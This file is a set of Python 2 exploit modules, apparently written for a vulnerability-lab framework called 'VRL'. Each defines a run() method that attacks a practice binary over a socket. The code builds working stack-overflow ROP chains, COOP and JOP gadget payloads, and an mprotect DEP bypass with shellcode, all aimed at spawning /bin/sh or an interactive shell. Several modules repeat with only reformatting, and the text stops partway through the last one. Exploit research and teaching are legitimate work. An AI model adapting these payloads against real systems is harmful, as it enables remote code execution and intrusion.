def run(self):
if self.options['architecture'] == 'amd64':
if self.options['static'] == 'False':
'''Run your exploit here, if this script could success, the VRL can run it.
When the exploit run, follow the options.'''
# s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#s.connect((self.options['dIP'], int(self.options['port'])))
p = remote(self.options['dIP'], int(self.options['port']))
#p = process('../../vulnerabilities/coop/coop')
a = raw_input('input: ')
#set /bin/sh ASCII
binsh = p32(0x6e69622f) + p32(0x0068732f) + p32(0x74697865) + p32(0x63003020) + p32(0x6e6f6e61) + p32(0x6c616369)
#set payload
temppayload = "b"*2
#s.send(temppayload)
p.sendline(temppayload)
payload = binsh + p64(self.property['courseMLoopVptr']) + p64(self.property['studentsptr']) + p64(self.property['nstudent']) + p64(self.property['studentptr0']) + p64(self.property['studentptr1']) + p64(self.property['studentptr3']) + p64(self.property['studentptr2']) + p64(self.property['coursePrintfSystemVptr']) + p64(self.property['studentReadString']) + p64(self.property['examSumScore']) + p64(self.property['scoreA']) + p64(self.property['scoreB']) + p64(self.property['scoreC']) + p64(self.property['buibuttonClicked']) + p64(self.property['sysaddress'])
#s.send(payload)
p.sendline(payload)
#get new sysaddress here
#recv_data = s.recv(16)
recv_data = p.recvline()
self.property['sysaddress'] = int(recv_data,16)
print "sysaddress = " + hex(self.property['sysaddress'])
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
#get /bin/sh offset
binsh_addr_offset = next(libc.search('/bin/sh')) -libc.symbols['system']
print "binsh_addr_offset = " + hex(binsh_addr_offset)
#get /bin/sh address
binsh_addr = self.property['sysaddress'] + binsh_addr_offset
print "binsh_addr = " + hex(binsh_addr)
#set payload
payload = p64(self.property['examSumScore']) + p64(self.property['scoreA']) + p64(self.property['scoreB']) + p64(self.property['scoreC']) + p64(self.property['buibuttonClicked']) + p64(binsh_addr) + p64(self.property['sysaddress'])
#s.send(payload)
p.sendline(payload)
print 'interactive'
#s.close()
p.interactive()
else:
print 'static'
elif self.options['architecture'] == 'i386':
if self.options['static'] == 'False':
print 'dl'
else:
print 'static'
else:
print 'Unrecognized architecture, stop.'
return
def run(self):
if self.options['static'] == 'False':
'''Run your exploit here, if this script could success, the VRL can run it.
When the exploit run, follow the options.'''
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.options['dIP'], int(self.options['port'])))
#get new sysaddress here
s.send("a") #any string
recv_data = s.recv(16)
self.property['sysaddress'] = int(recv_data,16)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
#get /bin/sh offset
print "sysaddress = " + hex(self.property['sysaddress'])
binsh_addr_offset = next(libc.search('/bin/sh')) -libc.symbols['system']
print "binsh_addr_offset = " + hex(binsh_addr_offset)
#get ret offset
pop_ret_offset = self.property['ret'] - libc.symbols['system']
print "pop_ret_offset = " + hex(pop_ret_offset)
#get /bin/sh address
binsh_addr = self.property['sysaddress'] + binsh_addr_offset
#get ret address
pop_ret_addr = self.property['sysaddress'] + pop_ret_offset
payload = "a"*self.property['offset'] + p64(pop_ret_addr) + p64(binsh_addr) + p64(self.property['sysaddress'])
print "\n##########sending payload##########\n"
s.send(payload)
s.close()
#p.interactive()
else:
'''Run your exploit here, if this script could success, the VRL can run it.
When the exploit run, follow the options.'''
self.property = {'ret':0x0000000000401696, #gadget address in exe
'offset':24, #offset
'sysaddress':0x0} # system function address, initialize 0
self.vulnerability= 'vulnerabilities/stack_overflow/ggteststatic'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.options['dIP'], int(self.options['port'])))
libc = ELF('../../vulnerabilities/stack_overflow/ggteststatic')
self.property['sysaddress'] = libc.symbols['system']
print "sysaddress = " + hex(self.property['sysaddress'])
#get /bin/sh address
binsh_addr = next(libc.search('/bin/sh'))
#get ret address
pop_ret_addr = self.property['ret']
payload = "a"*self.property['offset'] + p64(pop_ret_addr) + p64(binsh_addr) + p64(self.property['sysaddress'])
print "\n##########sending payload##########\n"
s.send(payload)
s.close()
def run(self):
if self.options['architecture'] == 'amd64':
if self.options['static'] == 'False':
'''Run your exploit here, if this script could success, the VRL can run it.
When the exploit run, follow the options.'''
p = remote(self.options['dIP'], int(self.options['port']))
#a = raw_input('input: ')
#set /bin/sh ASCII
binsh = p32(0x6e69622f) + p32(0x0068732f)
#set payload
payload = 'a'*(self.property['offset']-8) + binsh + p32(self.property['limit']) + p32(self.property['choose']) + p64(self.property['p']) + p64(self.property['q'])
#send payload
p.sendline(payload)
#recv
recv_data = p.recv()
print 'rev1: ' + recv_data
#set payload
payload = 'a'*(self.property['offset']-8) + binsh + p32(self.property['limit']) + p32(self.property['choose'])
#send payload
p.sendline(payload)
#recv get new sysaddress here
recv_data = p.recvline()
print 'rev2: ' + recv_data
self.property['sysaddress'] = int(recv_data,16)
print "sysaddress = " + hex(self.property['sysaddress'])
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
#get /bin/sh offset
binsh_addr_offset = next(libc.search('/bin/sh')) -libc.symbols['system']
print "binsh_addr_offset = " + hex(binsh_addr_offset)
#get /bin/sh address
binsh_addr = self.property['sysaddress'] + binsh_addr_offset
print "binsh_addr = " + hex(binsh_addr)
#set payload
self.property['choose'] = 2
self.property['p'] = 0x601098
self.property['q'] = 0x7fffffffdc78
payload = 'a'*(self.property['offset']-8)+ p64(self.property['sysaddress']) + p32(self.property['limit']) + p32(self.property['choose']) + p64(self.property['p']) + p64(self.property['q'])
#send payload
p.sendline(payload)
#recv
recv_data = p.recvline()
print 'rev3: ' + recv_data
#set payload
self.property['choose'] = 2
self.property['p'] = 0x60109c
self.property['q'] = 0x7fffffffdc7c
payload = 'a'*(self.property['offset']-8)+ p64(self.property['sysaddress']) + p32(self.property['limit']) + p32(self.property['choose']) + p64(self.property['p']) + p64(self.property['q'])
#send payload
p.sendline(payload)
#recv
recv_data = p.recvline()
print 'rev4: ' + recv_data
#set payload
self.property['limit'] = 0
self.property['choose'] = 3
self.property['p'] = 0x601070
self.property['q'] = 0x601078
payload = binsh + 'a'*(self.property['offset']-8) + p32(self.property['limit']) + p32(self.property['choose']) + p64(self.property['p']) + p64(self.property['q'])
#send payload
p.sendline(payload)
print 'interactive'
p.interactive()
else:
print 'static'
elif self.options['architecture'] == 'i386':
if self.options['static'] == 'False':
print 'dl'
else:
print 'static'
else:
print 'Unrecognized architecture, stop.'
return
def run(self):
'''Run your exploit here, if this script could success, the VRL can run it.
When the exploit run, follow the options.'''
if self.options['architecture'] == 'amd64':
if self.options['static'] == 'False':
self.property = {'ret1': 0x0000000000021102, # gadget address in libc
'ret2': 0x000000000008ae95,
'ret3': 0x000000000003a718,
'ret4': 0x0000000000114809,
'ret5': 0x00000000000bb945,
'data1': 0x000000000000003b, # execv systemcall number
'data2': 0x0000000000000000,
'data3': 0x0000000000000000,
'offset': 40, # offset
'sysaddress': 0x0} # system function address, initialize 0
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.options['dIP'], int(self.options['port'])))
# get new sysaddress here
s.send("a") # any string
recv_data = s.recv(16)
self.property['sysaddress'] = int(recv_data, 16)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
print "sysaddress = " + hex(self.property['sysaddress'])
# get /bin/sh offset
binsh_addr_offset = next(libc.search('/bin/sh')) - libc.symbols['system']
print "binsh_addr_offset = " + hex(binsh_addr_offset)
# get ret offset
pop_ret1_offset = self.property['ret1'] - libc.symbols['system']
pop_ret2_offset = self.property['ret2'] - libc.symbols['system']
pop_ret3_offset = self.property['ret3'] - libc.symbols['system']
pop_ret4_offset = self.property['ret4'] - libc.symbols['system']
pop_ret5_offset = self.property['ret5'] - libc.symbols['system']
# get /bin/sh address
binsh_addr = self.property['sysaddress'] + binsh_addr_offset
# get ret address
pop_ret1_addr = self.property['sysaddress'] + pop_ret1_offset
pop_ret2_addr = self.property['sysaddress'] + pop_ret2_offset
pop_ret3_addr = self.property['sysaddress'] + pop_ret3_offset
pop_ret4_addr = self.property['sysaddress'] + pop_ret4_offset
pop_ret5_addr = self.property['sysaddress'] + pop_ret5_offset
# pop_ret5_addr =pop_ret4_addr - 2
# set payload
payload = "a" * self.property['offset'] + p64(pop_ret1_addr) + p64(binsh_addr) + p64(
pop_ret2_addr) + p64(pop_ret3_addr) + p64(self.property['data1']) + p64(pop_ret4_addr) + p64(
self.property['data2']) + p64(self.property['data3']) + p64(pop_ret5_addr)
print "\n##########sending payload##########\n"
s.send(payload)
s.close()
else:
self.property = {'ret1': 0x0000000000401696, # gadget address in libc
'ret2': 0x00000000004264af,
'ret3': 0x00000000004c26e8,
'ret4': 0x0000000000442fe9,
'ret5': 0x0000000000467685,
'data1': 0x000000000000003b, # execv systemcall number
'data2': 0x0000000000000000,
'data3': 0x0000000000000000,
'offset': 24, # offset
'sysaddress': 0x0} # system function address, initialize 0
self.vulnerability = 'vulnerabilities/stack_overflow/ggteststatic'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.options['dIP'], int(self.options['port'])))
libc = ELF('../../vulnerabilities/stack_overflow/ggteststatic')
# get sysaddress here
self.property['sysaddress'] = libc.symbols['system']
print "sysaddress = " + hex(self.property['sysaddress'])
# get /bin/sh address
binsh_addr = next(libc.search('/bin/sh'))
# get ret address
pop_ret1_addr = self.property['ret1']
pop_ret2_addr = self.property['ret2']
pop_ret3_addr = self.property['ret3']
pop_ret4_addr = self.property['ret4']
pop_ret5_addr = self.property['ret5']
# set payload
payload = "a" * self.property['offset'] + p64(pop_ret1_addr) + p64(binsh_addr) + p64(
pop_ret2_addr) + p64(pop_ret3_addr) + p64(self.property['data1']) + p64(pop_ret4_addr) + p64(
self.property['data2']) + p64(self.property['data3']) + p64(pop_ret5_addr)
print "\n##########sending payload##########\n"
s.send(payload)
s.close()
elif self.options['architecture'] == 'i386':
if self.options['static'] == 'False':
self.property = {'ret1': 0x00018395, # gadget address in libc : pop ebx ; ret
'ret2': 0x0002c5dc, # : xor eax, eax ; ret
'ret3': 0x00023f97, # : pop eax ; ret
'ret4': 0x0002baab, # : pop ecx ; pop edx ; ret
'ret5': 0x00002c87, # : int 0x80
'data1': 0x0000000b, # execv systemcall number
'data2': 0x00000000,
'data3': 0x00000000,
'offset': 26, # offset
'sysaddress': 0x0} # system function address, initialize 0
'''Run your exploit here, if this script could success, the VRL can run it.
When the exploit run, follow the options.'''
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.options['dIP'], int(self.options['port'])))
# get new sysaddress here
s.send("a") # any string
recv_data = s.recv(8)
self.property['sysaddress'] = int(recv_data, 16)
libc = ELF('/lib32/libc.so.6')
print "sysaddress = " + hex(self.property['sysaddress'])
# get /bin/sh offset
binsh_addr_offset = next(libc.search('/bin/sh')) - libc.symbols['system']
print "binsh_addr_offset = " + hex(binsh_addr_offset)
# get ret offset
pop_ret1_offset = self.property['ret1'] - libc.symbols['system']
pop_ret2_offset = self.property['ret2'] - libc.symbols['system']
pop_ret3_offset = self.property['ret3'] - libc.symbols['system']
pop_ret4_offset = self.property['ret4'] - libc.symbols['system']
pop_ret5_offset = self.property['ret5'] - libc.symbols['system']
# get /bin/sh address
binsh_addr = self.property['sysaddress'] + binsh_addr_offset
# get ret address
pop_ret1_addr = self.property['sysaddress'] + pop_ret1_offset
pop_ret2_addr = self.property['sysaddress'] + pop_ret2_offset
pop_ret3_addr = self.property['sysaddress'] + pop_ret3_offset
pop_ret4_addr = self.property['sysaddress'] + pop_ret4_offset
pop_ret5_addr = self.property['sysaddress'] + pop_ret5_offset
# pop_ret5_addr =pop_ret4_addr - 2
# set payload
payload = "a" * self.property['offset'] + p32(pop_ret1_addr) + p32(binsh_addr) + p32(
pop_ret2_addr) + p32(pop_ret3_addr) + p32(self.property['data1']) + p32(pop_ret4_addr) + p32(
self.property['data2']) + p32(self.property['data3']) + p32(pop_ret5_addr)
print "\n##########sending payload##########\n"
s.send(payload)
s.close()
else:
print "Not supported: i386 & static."
else:
print 'Unrecognized architecture, stop.'
return
def run(self):
if self.options['architecture'] == 'amd64':
if self.options['static'] == 'False':
'''Run your exploit here, if this script could success, the VRL can run it.
When the exploit run, follow the options.'''
p = remote(self.options['dIP'], int(self.options['port']))
#a = raw_input('input: ')
#set /bin/sh ASCII
binsh = p32(0x6e69622f) + p32(0x0068732f)
#set payload
payload = 'a' * (self.property['offset'] - 8) + binsh + p32(
self.property['limit']) + p32(
self.property['choose']) + p64(
self.property['p']) + p64(self.property['q'])
#send payload
p.sendline(payload)
#recv
recv_data = p.recv()
print 'rev1: ' + recv_data
#set payload
payload = 'a' * (self.property['offset'] - 8) + binsh + p32(
self.property['limit']) + p32(self.property['choose'])
#send payload
p.sendline(payload)
#recv get new sysaddress here
recv_data = p.recvline()
print 'rev2: ' + recv_data
self.property['sysaddress'] = int(recv_data, 16)
print "sysaddress = " + hex(self.property['sysaddress'])
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
#get /bin/sh offset
binsh_addr_offset = next(
libc.search('/bin/sh')) - libc.symbols['system']
print "binsh_addr_offset = " + hex(binsh_addr_offset)
#get /bin/sh address
binsh_addr = self.property['sysaddress'] + binsh_addr_offset
print "binsh_addr = " + hex(binsh_addr)
#set payload
self.property['choose'] = 2
self.property['p'] = 0x601098
self.property['q'] = 0x7fffffffdc78
payload = 'a' * (self.property['offset'] - 8) + p64(
self.property['sysaddress']) + p32(
self.property['limit']) + p32(
self.property['choose']) + p64(
self.property['p']) + p64(self.property['q'])
#send payload
p.sendline(payload)
#recv
recv_data = p.recvline()
print 'rev3: ' + recv_data
#set payload
self.property['choose'] = 2
self.property['p'] = 0x60109c
self.property['q'] = 0x7fffffffdc7c
payload = 'a' * (self.property['offset'] - 8) + p64(
self.property['sysaddress']) + p32(
self.property['limit']) + p32(
self.property['choose']) + p64(
self.property['p']) + p64(self.property['q'])
#send payload
p.sendline(payload)
#recv
recv_data = p.recvline()
print 'rev4: ' + recv_data
#set payload
self.property['limit'] = 0
self.property['choose'] = 3
self.property['p'] = 0x601070
self.property['q'] = 0x601078
payload = binsh + 'a' * (self.property['offset'] - 8) + p32(
self.property['limit']) + p32(
self.property['choose']) + p64(
self.property['p']) + p64(self.property['q'])
#send payload
p.sendline(payload)
print 'interactive'
p.interactive()
else:
print 'static'
elif self.options['architecture'] == 'i386':
if self.options['static'] == 'False':
print 'dl'
else:
print 'static'
else:
print 'Unrecognized architecture, stop.'
return
def run(self):
if self.options['static'] == 'False':
'''Run your exploit here, if this script could success, the VRL can run it.
When the exploit run, follow the options.'''
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.options['dIP'], int(self.options['port'])))
#get new sysaddress here
s.send("a") #any string
recv_data = s.recv(16)
self.property['sysaddress'] = int(recv_data, 16)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
#get /bin/sh offset
print "sysaddress = " + hex(self.property['sysaddress'])
binsh_addr_offset = next(
libc.search('/bin/sh')) - libc.symbols['system']
print "binsh_addr_offset = " + hex(binsh_addr_offset)
#get ret offset
pop_ret_offset = self.property['ret'] - libc.symbols['system']
print "pop_ret_offset = " + hex(pop_ret_offset)
#get /bin/sh address
binsh_addr = self.property['sysaddress'] + binsh_addr_offset
#get ret address
pop_ret_addr = self.property['sysaddress'] + pop_ret_offset
payload = "a" * self.property['offset'] + p64(pop_ret_addr) + p64(
binsh_addr) + p64(self.property['sysaddress'])
print "\n##########sending payload##########\n"
s.send(payload)
s.close()
#p.interactive()
else:
'''Run your exploit here, if this script could success, the VRL can run it.
When the exploit run, follow the options.'''
self.property = {
'ret': 0x0000000000401696, #gadget address in exe
'offset': 24, #offset
'sysaddress': 0x0
} # system function address, initialize 0
self.vulnerability = 'vulnerabilities/stack_overflow/ggteststatic'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.options['dIP'], int(self.options['port'])))
libc = ELF('../../vulnerabilities/stack_overflow/ggteststatic')
self.property['sysaddress'] = libc.symbols['system']
print "sysaddress = " + hex(self.property['sysaddress'])
#get /bin/sh address
binsh_addr = next(libc.search('/bin/sh'))
#get ret address
pop_ret_addr = self.property['ret']
payload = "a" * self.property['offset'] + p64(pop_ret_addr) + p64(
binsh_addr) + p64(self.property['sysaddress'])
print "\n##########sending payload##########\n"
s.send(payload)
s.close()
def run(self):
if self.options['static'] == 'False':
'''Run your exploit here, if this script could success, the VRL can run it.
When the exploit run, follow the options.'''
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.options['dIP'], int(self.options['port'])))
#get new sysaddress here
s.send('a')
recv_data = s.recv(16)
self.property['sysaddress'] = int(recv_data,16)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
print "sysaddress = " + hex(self.property['sysaddress'])
#get rbp
s.send('b')
recv_data1 = s.recv(16)
self.property['gadgetaddr'] = int(recv_data1,16)
print "gadgetaddr = " + hex(self.property['gadgetaddr'])
gadgetaddr=self.property['gadgetaddr'] + 72
#get /bin/sh offset
binsh_addr_offset = next(libc.search('/bin/sh')) -libc.symbols['system']
print "binsh_addr_offset = " + hex(binsh_addr_offset)
#get jmp offset
pop_jmp1_offset = self.property['jmp1'] - libc.symbols['system']
pop_jmp2_offset = self.property['jmp2'] - libc.symbols['system']
pop_jmp3_offset = self.property['jmp3'] - libc.symbols['system']
pop_jmp4_offset = self.property['jmp4'] - libc.symbols['system']
pop_jmp5_offset = self.property['jmp5'] - libc.symbols['system']
pop_jmp6_offset = self.property['jmp6'] - libc.symbols['system']
print "pop_jmp1_offset = " + hex(pop_jmp1_offset)
#get /bin/sh address
binsh_addr = self.property['sysaddress'] + binsh_addr_offset
#get jmp address
pop_jmp1_addr = self.property['sysaddress'] + pop_jmp1_offset
pop_jmp2_addr = self.property['sysaddress'] + pop_jmp2_offset
pop_jmp3_addr = self.property['sysaddress'] + pop_jmp3_offset
pop_jmp4_addr = self.property['sysaddress'] + pop_jmp4_offset
pop_jmp5_addr = self.property['sysaddress'] + pop_jmp5_offset
pop_jmp52_addr = self.property['sysaddress'] + pop_jmp5_offset
pop_jmp6_addr = self.property['sysaddress'] + pop_jmp6_offset
print "pop_jmp1_addr = " + hex(pop_jmp1_addr)
#set payload
payload = "a"*self.property['offset'] + p64(self.property['ret']) + p64(self.property['dispatcherAddr']) + p64(self.property['dispatcherAddr']) + p64(gadgetaddr) + p64(binsh_addr) + p64(self.property['data1']) + p64(self.property['data1']) + p64(self.property['data1']) + p64(self.property['data2']) + p64(pop_jmp1_addr) + p64(pop_jmp2_addr) + p64(pop_jmp3_addr) + p64(pop_jmp4_addr) + p64(pop_jmp5_addr) + p64(pop_jmp52_addr) + p64(pop_jmp6_addr)
print "\n##########sending payload##########\n"
s.send(payload)
s.close()
else:
self.property = {'ret':0x00000000004009d9, #initialize register address
'dispatcherAddr':0x00000000004009dc,# dispatcher gadget address
'gadgetaddr':0x0,#the address of first gadget address in stack, initialize 0
'data1':0x0000000000000000,
'data2':0x000000000000003b,#execv systemcall number
'jmp1':0x00000000004738cd,#functional gadget address in libc
'jmp2':0x000000000047e7a0,
'jmp3':0x0000000000441cb2,
'jmp4':0x0000000000441cb2,
'jmp5':0x00000000004009e2,
'jmp6':0x0000000000467685,
'offset':24, # offset
'sysaddress':0x0} # system function address, initialize 0
self.vulnerability= 'vulnerabilities/stack_overflow/ggteststatic'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.options['dIP'], int(self.options['port'])))
libc = ELF('../../vulnerabilities/stack_overflow/ggteststatic')
#get sysaddress here
self.property['sysaddress'] = libc.symbols['system']
print "sysaddress = " + hex(self.property['sysaddress'])
#get rbp
s.send('b')
recv_data1 = s.recv(16)
self.property['gadgetaddr'] = int(recv_data1,16)
print "gadgetaddr = " + hex(self.property['gadgetaddr'])
gadgetaddr=self.property['gadgetaddr'] + 64
#get /bin/sh address
binsh_addr = next(libc.search('/bin/sh'))
#get jmp offset
pop_jmp1_addr = self.property['jmp1']
pop_jmp2_addr = self.property['jmp2']
pop_jmp3_addr = self.property['jmp3']
pop_jmp4_addr = self.property['jmp4']
pop_jmp5_addr = self.property['jmp5']
pop_jmp6_addr = self.property['jmp6']
#set payload
payload = "a"*self.property['offset'] + p64(self.property['ret']) + p64(self.property['dispatcherAddr']) + p64(self.property['dispatcherAddr']) + p64(gadgetaddr) + p64(self.property['data1']) + p64(self.property['data1']) + p64(binsh_addr) + p64(self.property['data2']) + p64(pop_jmp1_addr) + p64(pop_jmp2_addr) + p64(pop_jmp3_addr) + p64(pop_jmp4_addr) + p64(pop_jmp5_addr) + p64(pop_jmp6_addr)
print "\n##########sending payload##########\n"
s.send(payload)
s.close()
def run(self):
if self.options['static'] == 'False':
'''Run your exploit here, if this script could success, the VRL can run it.
When the exploit run, follow the options.'''
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.options['dIP'], int(self.options['port'])))
#get new sysaddress here
s.send('a')
recv_data = s.recv(16)
self.property['sysaddress'] = int(recv_data, 16)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
print "sysaddress = " + hex(self.property['sysaddress'])
#get rbp
s.send('b')
recv_data1 = s.recv(16)
self.property['gadgetaddr'] = int(recv_data1, 16)
print "gadgetaddr = " + hex(self.property['gadgetaddr'])
gadgetaddr = self.property['gadgetaddr'] + 72
#get /bin/sh offset
binsh_addr_offset = next(
libc.search('/bin/sh')) - libc.symbols['system']
print "binsh_addr_offset = " + hex(binsh_addr_offset)
#get jmp offset
pop_jmp1_offset = self.property['jmp1'] - libc.symbols['system']
pop_jmp2_offset = self.property['jmp2'] - libc.symbols['system']
pop_jmp3_offset = self.property['jmp3'] - libc.symbols['system']
pop_jmp4_offset = self.property['jmp4'] - libc.symbols['system']
pop_jmp5_offset = self.property['jmp5'] - libc.symbols['system']
pop_jmp6_offset = self.property['jmp6'] - libc.symbols['system']
print "pop_jmp1_offset = " + hex(pop_jmp1_offset)
#get /bin/sh address
binsh_addr = self.property['sysaddress'] + binsh_addr_offset
#get jmp address
pop_jmp1_addr = self.property['sysaddress'] + pop_jmp1_offset
pop_jmp2_addr = self.property['sysaddress'] + pop_jmp2_offset
pop_jmp3_addr = self.property['sysaddress'] + pop_jmp3_offset
pop_jmp4_addr = self.property['sysaddress'] + pop_jmp4_offset
pop_jmp5_addr = self.property['sysaddress'] + pop_jmp5_offset
pop_jmp52_addr = self.property['sysaddress'] + pop_jmp5_offset
pop_jmp6_addr = self.property['sysaddress'] + pop_jmp6_offset
print "pop_jmp1_addr = " + hex(pop_jmp1_addr)
#set payload
payload = "a" * self.property['offset'] + p64(
self.property['ret']
) + p64(self.property['dispatcherAddr']) + p64(
self.property['dispatcherAddr']
) + p64(gadgetaddr) + p64(binsh_addr) + p64(
self.property['data1']) + p64(self.property['data1']) + p64(
self.property['data1']) + p64(
self.property['data2']) + p64(pop_jmp1_addr) + p64(
pop_jmp2_addr) + p64(pop_jmp3_addr) + p64(
pop_jmp4_addr) + p64(pop_jmp5_addr) + p64(
pop_jmp52_addr) + p64(pop_jmp6_addr)
print "\n##########sending payload##########\n"
s.send(payload)
s.close()
else:
self.property = {
'ret': 0x00000000004009d9, #initialize register address
'dispatcherAddr':
0x00000000004009dc, # dispatcher gadget address
'gadgetaddr':
0x0, #the address of first gadget address in stack, initialize 0
'data1': 0x0000000000000000,
'data2': 0x000000000000003b, #execv systemcall number
'jmp1': 0x00000000004738cd, #functional gadget address in libc
'jmp2': 0x000000000047e7a0,
'jmp3': 0x0000000000441cb2,
'jmp4': 0x0000000000441cb2,
'jmp5': 0x00000000004009e2,
'jmp6': 0x0000000000467685,
'offset': 24, # offset
'sysaddress': 0x0
} # system function address, initialize 0
self.vulnerability = 'vulnerabilities/stack_overflow/ggteststatic'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.options['dIP'], int(self.options['port'])))
libc = ELF('../../vulnerabilities/stack_overflow/ggteststatic')
#get sysaddress here
self.property['sysaddress'] = libc.symbols['system']
print "sysaddress = " + hex(self.property['sysaddress'])
#get rbp
s.send('b')
recv_data1 = s.recv(16)
self.property['gadgetaddr'] = int(recv_data1, 16)
print "gadgetaddr = " + hex(self.property['gadgetaddr'])
gadgetaddr = self.property['gadgetaddr'] + 64
#get /bin/sh address
binsh_addr = next(libc.search('/bin/sh'))
#get jmp offset
pop_jmp1_addr = self.property['jmp1']
pop_jmp2_addr = self.property['jmp2']
pop_jmp3_addr = self.property['jmp3']
pop_jmp4_addr = self.property['jmp4']
pop_jmp5_addr = self.property['jmp5']
pop_jmp6_addr = self.property['jmp6']
#set payload
payload = "a" * self.property['offset'] + p64(
self.property['ret']
) + p64(self.property['dispatcherAddr']) + p64(
self.property['dispatcherAddr']) + p64(gadgetaddr) + p64(
self.property['data1']) + p64(
self.property['data1']) + p64(binsh_addr) + p64(
self.property['data2']) + p64(pop_jmp1_addr) + p64(
pop_jmp2_addr) + p64(pop_jmp3_addr) + p64(
pop_jmp4_addr) + p64(pop_jmp5_addr) + p64(
pop_jmp6_addr)
print "\n##########sending payload##########\n"
s.send(payload)
s.close()
def run(self):
if self.options['static'] == 'False':
'''Run your exploit here, if this script could success, the VRL can run it.
When the exploit run, follow the options.'''
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.options['dIP'], int(self.options['port'])))
#get new sysaddress here
s.send('a')
recv_data = s.recv(16)
self.property['sysaddress'] = int(recv_data,16)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
print "sysaddress = " + hex(self.property['sysaddress'])
#get rbp
s.send('b')
recv_data1 = s.recv(16)
rbpvalue= int(recv_data1,16)
print "rbpvalue = " + hex(rbpvalue)
#get shellcode address
self.property['shellcodeaddress'] = rbpvalue + 112
#get /bin/sh offset
binsh_addr_offset = next(libc.search('/bin/sh')) -libc.symbols['system']
print "binsh_addr_offset = " + hex(binsh_addr_offset)
#get ret offset
pop_ret1_offset = self.property['ret1'] - libc.symbols['system']
pop_ret2_offset = self.property['ret2'] - libc.symbols['system']
pop_ret3_offset = self.property['ret3'] - libc.symbols['system']
pop_ret4_offset = self.property['ret4'] - libc.symbols['system']
#get /bin/sh address
binsh_addr = self.property['sysaddress'] + binsh_addr_offset
#get ret address
pop_ret1_addr = self.property['sysaddress'] + pop_ret1_offset
pop_ret2_addr = self.property['sysaddress'] + pop_ret2_offset
pop_ret3_addr = self.property['sysaddress'] + pop_ret3_offset
pop_ret4_addr = self.property['sysaddress'] + pop_ret4_offset
pagenum=self.property['data2'] * 3
print pagenum
#print helloworld
shellcode="\xeb\x1e\x5e\x48\x31\xc0\xb0\x01"
shellcode +="\x48\x89\xc7\x48\x89\xfa\x48\x83"
shellcode +="\xc2\x0e\x0f\x05\x48\x31\xc0\x48"
shellcode +="\x83\xc0\x3c\x48\x31\xff\x0f\x05"
shellcode +="\xe8\xdd\xff\xff\xff\x48\x65\x6c"
shellcode +="\x6c\x6f\x2c\x20\x77\x6f\x72\x6c\x64\x21\x0a"
#shell
shellcode="\x5f\x48\x31\xc0\x58\x5a\x5e\x0f\x05"
#set payload rop shut off dep
payload = "a"*self.property['offset'] + p64(pop_ret1_addr) + p64(self.property['pageaddress']) + p64(pop_ret2_addr) + p64(self.property['data1']) + p64(pagenum) + p64(pop_ret3_addr) + p64(self.property['data3']) + p64(pop_ret4_addr) + p64(self.property['shellcodeaddress']) + p64(binsh_addr) + p64(self.property['data4']) + p64(self.property['data5']) + p64(self.property['data5']) + self.payload
print "\n##########sending payload to shut off dep ##########\n"
s.send(payload)
s.close()
else:
self.property = {'ret1':0x0000000000401696, #gadget address
'ret2':0x0000000000442fe9 ,
'ret3':0x00000000004c26e8 ,
'ret4':0x0000000000467685 ,
'pageaddress':0x7fffffffd000,
'shellcodeaddress':0x0,#shellcode address in stack
'data1':0x0000000000000007,# PROT_EXEC The memory can be executed.
'data2':0x0000000000001000,# 4096 pagesize
'data3':0x000000000000000a, #mprotect systemcall number, mprotect() changes protection for the calling process's memory page(s)
'data4':0x000000000000003b,#execv systemcall number
'data5':0x0000000000000000,
'offset':24, # offset
'sysaddress':0x0} # system function address, initialize 0
self.vulnerability= 'vulnerabilities/stack_overflow/ggteststatic'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.options['dIP'], int(self.options['port'])))
libc = ELF('../../vulnerabilities/stack_overflow/ggteststatic_stacknoexe')
#get sysaddress here
self.property['sysaddress'] = libc.symbols['system']
print "sysaddress = " + hex(self.property['sysaddress'])
#get rbp
s.send('b')
recv_data1 = s.recv(16)
rbpvalue= int(recv_data1,16)
print "rbpvalue = " + hex(rbpvalue)
#get shellcode address
self.property['shellcodeaddress'] = rbpvalue + 112
#get /bin/sh address
binsh_addr = next(libc.search('/bin/sh'))
#get ret offset
pop_ret1_addr = self.property['ret1']
pop_ret2_addr = self.property['ret2']
pop_ret3_addr = self.property['ret3']
pop_ret4_addr = self.property['ret4']
pagenum=self.property['data2'] * 3
print pagenum
#print helloworld
shellcode="\xeb\x1e\x5e\x48\x31\xc0\xb0\x01"
shellcode +="\x48\x89\xc7\x48\x89\xfa\x48\x83"
shellcode +="\xc2\x0e\x0f\x05\x48\x31\xc0\x48"
shellcode +="\x83\xc0\x3c\x48\x31\xff\x0f\x05"
shellcode +="\xe8\xdd\xff\xff\xff\x48\x65\x6c"
shellcode +="\x6c\x6f\x2c\x20\x77\x6f\x72\x6c\x64\x21\x0a"
#shell
#shellcode="\x5f\x48\x31\xc0\x58\x5a\x5e\x0f\x05"
#set payload rop shut off dep
